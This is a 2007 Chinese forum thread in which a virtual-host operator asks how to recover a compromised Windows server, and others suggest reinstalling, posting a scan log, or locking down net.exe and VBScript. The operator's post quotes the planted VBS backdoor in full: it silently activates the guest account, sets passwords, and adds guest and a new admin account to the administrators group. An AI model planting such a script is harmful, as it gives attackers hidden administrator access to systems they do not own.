一台服务器中招了，苦恼中

小于 · 发表于 2007-7-14 00:57:40

给朋友做了虚拟主机，开了ASP，被黑，估计是埋下了啥东西，IP是219.138.224.192，现在进MS-DOS方式会先运行一个VBS，我把它删除了，是个开权限的东西，直接运行CMD.EXE文件也是这样，但CMD.exe文件没有啥变化。

怎么恢复呢？

那个vbs的内容是

dim wsh
set wsh=CreateObject("WScript.Shell")
wsh.run "net user guest /active:yes",0
wsh.run "net user guest 125699",0
wsh.run "net localgroup administrators guest /add",0
wsh.run "net1 user admin /active:yes",0
wsh.run "net1 user admin 125699 /add",0
wsh.run "net1 localgroup administrators admin /add",0

好狠吖

wudizt · 发表于 2007-7-14 10:50:10

这个俺不懂了。只能帮小于顶一下了。:funk:

刀口 · 发表于 2007-7-15 07:48:01

既然都这样，稳妥的办法还是重装吧。谁知道还有没有其它后门呢？

小于 · 发表于 2007-7-15 11:33:01

重装工程太大了！！

wowh · 发表于 2007-7-15 20:46:32

用sreng扫了放份log上来

不然很难分析啊

coolfax · 发表于 2007-7-18 10:57:00

我的做法是：把net.exe net1.exe 的全部权限都去掉，黑客就无法使用这2个命令了

然后卸载Windows Script ，这样VBS也不能运行了

雨夜咖啡 · 发表于 2007-7-23 09:10:43

辛苦了老大

softworm · 发表于 2007-7-23 16:59:39

原帖由 wowh 于 2007-7-15 20:46 发表
用sreng扫了放份log上来

不然很难分析啊

正想这么回呢，详见我签名

		自动登录	找回密码
密码			立即注册